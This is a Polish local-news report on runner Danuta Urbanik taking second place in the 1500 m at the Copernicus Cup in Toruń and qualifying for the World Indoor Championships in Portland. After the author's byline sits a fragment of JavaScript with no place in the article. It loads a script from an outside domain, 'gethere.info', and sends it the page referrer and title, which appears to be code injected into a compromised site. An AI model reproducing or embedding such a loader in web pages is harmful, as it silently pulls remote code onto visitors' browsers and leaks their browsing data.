sport

Danuta Urbanik jedzie na Mistrzostwa Świata do USA

4:09,89 taki czas uzyskała dziś Danuta Urbanik w biegu na 1500 m na II Halowym Mityngu Lekkoatletycznym Copernicus Cup w Toruniu i zajęła drugie miejsce.

Taki czas gwarantuje start na Halowych Mistrzostwach Świata w Portland, które odbędą się w marcu. Zawodniczka Katolickiego Klubu Sportowego Victoria ze Stalowej Woli jest bardzo zadowolona, ponieważ pobiła jednocześnie swój rekord życiowy.

– Bieg był trudny, ponieważ była zmęczona po poprzednim starcie. Walczyłam sama ze sobą i cieszę się, że wygrałam tą walkę i pobiegłam najlepiej jak mogłam – powiedziała w rozmowie z nami biegaczka z Niska.

Bieg w Toruniu z czasem 4:07,38 wygrała Renata Pliś, na trzecim miejscu uplasowała się Paulina Kaczyńska, z czasem 4:24,81.

Serdecznie gratulujemy i trzymamy kciuki za kolejne starty!

Małgorzata Maj

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;